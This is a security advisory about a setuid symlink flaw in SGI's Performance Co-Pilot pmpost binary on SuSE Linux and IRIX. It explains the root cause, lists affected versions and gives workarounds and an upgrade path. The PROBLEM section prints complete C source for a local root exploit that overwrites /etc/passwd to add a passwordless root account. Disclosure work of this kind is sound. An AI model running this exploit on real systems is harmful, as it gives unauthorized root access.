COMMAND

    pmpost

SYSTEMS AFFECTED

    PCP package (IRIX, SuSE Linux)

PROBLEM

    Paul  Starzetz  found  following.   There  is  a  symlink handling
    problem in the pcp suite from SGI.  The binary pmpost will  follow
    symlinks, if setuid  root this leads  to instant root  compromise,
    as found on SuSE 7.1.

    Attached a  simple C  source to  demonstrate this  (gcc pm.c -o pm
    then ./pm):

    /********************************************************
    *							*
    *		pmpost local root exploit		*
    *		vulnerable: pcp <= 2.1.11-5		*
    *		by IhaQueR				*
    *							*
    ********************************************************/




    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <fcntl.h>
    #include <sys/stat.h>



    main()
    {
    const char *bin="/usr/share/pcp/bin/pmpost";
    static char buf[512];
    static char dir[128];


	    srand(time(NULL));
	    sprintf(dir, "/tmp/dupa.%.8d", rand());

	    if(mkdir(dir, S_IRWXU))
		    _exit(2);

	    if(chdir(dir))
		    _exit(3);

	    if(symlink("/etc/passwd", "./NOTICES"))
		    _exit(4);

	    snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir);

	    if(putenv(buf))
		    _exit(5);

	    if(!fork()) {
		    execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
		    _exit(1);
	    }
	    else {
		    waitpid(0, NULL, WUNTRACED);
		    chdir("..");
		    sprintf(buf, "rm -rf dupa.*");
		    system(buf);
		    execl("/bin/su", "/bin/su", "r00t", NULL);
	    }
    }

    The pmpost binary  is contained in  the package "pcp",  as shipped
    with the distributions SuSE-7.0, 7.1 and 7.2.  In the distribution
    7.0, /usr/share/pcp/bin/pmpost is not  installed setuid root.   In
    7.1 and 7.2,  pmpost _is_ setuid  root and therefore  exploitable.
    The  pcp  package  is  not  installed  by  default  in  any of the
    distributions.

    The source in src/libpcp/src/config.c reads

        if ((p = getenv(var)) != NULL)
            val = p;

    for configuration  items from  /etc/pcp.conf and  therefore trusts
    user  input/environment.   The  same  applies  for the environment
    variable PCP_CONF  that specifies  the configuration  file.   This
    attitude  towards  treating  user  input  does  not  qualify   for
    privileged   execution.      The    actual   open(2)    call    in
    src/pmpost/pmpost.c (near "umask(022);  /* is this  just paranoid?
    */) can't be fixed without completely ignoring the   user-supplied
    environment  since  open(2)  can't  guarantee  that a path segment
    leading to the file is not a symlink.

    It's probably  a very  rare package  under linux,  but more common
    under IRIX.

    With minor modifications, above exploits yields root with the IRIX
    version of PCP 2.1 running under IRIX 6.5.10.  PCP 2.2 under  IRIX
    6.5.11+ not tested.

    Comparing notes  with Jan-Frode  indicated that  SGI has  released
    more than one version of PCP 2.1.  Not all versions are vulnerable
    (PCP  2.1  under  6.5.6m  was  not).   One  way to check if you're
    vulnerable is to do a:

        strings /usr/pcp/bin/pmpost | grep PCP_LOG_DIR

SOLUTION

    As  a  temporary  and  permanent  workaround  for SuSE, remove the
    setuid bits  from the  two programs  /usr/share/pcp/bin/pmpost and
    /usr/share/pcp/bin/pmkstat  by  using  the  following  command (as
    root):

        chmod a-s /usr/share/pcp/bin/*

    A change  to /etc/permissions*  is not  necessary because  the two
    binaries are not  listed there.   Users of the  package might want
    to  change  ownerships  to  make  the  functionality of the pmpost
    program available again.  Alternatively, users may want to  delete
    the package if it is not used:  rpm --nodeps -e pcp.

    Performance Co-Pilot  (version 2.2.1-3)  is now  available.   This
    version contains  fixes for  the recent  security issues uncovered
    against the  earlier 2.2.0-18  release.   Please upgrade;  the new
    source and binary RPMs are available from

        http://oss.sgi.com/projects/pcp/download

    For  PCP  on  IRIX,  a  patch  will  be  available shortly for SGI
    customers.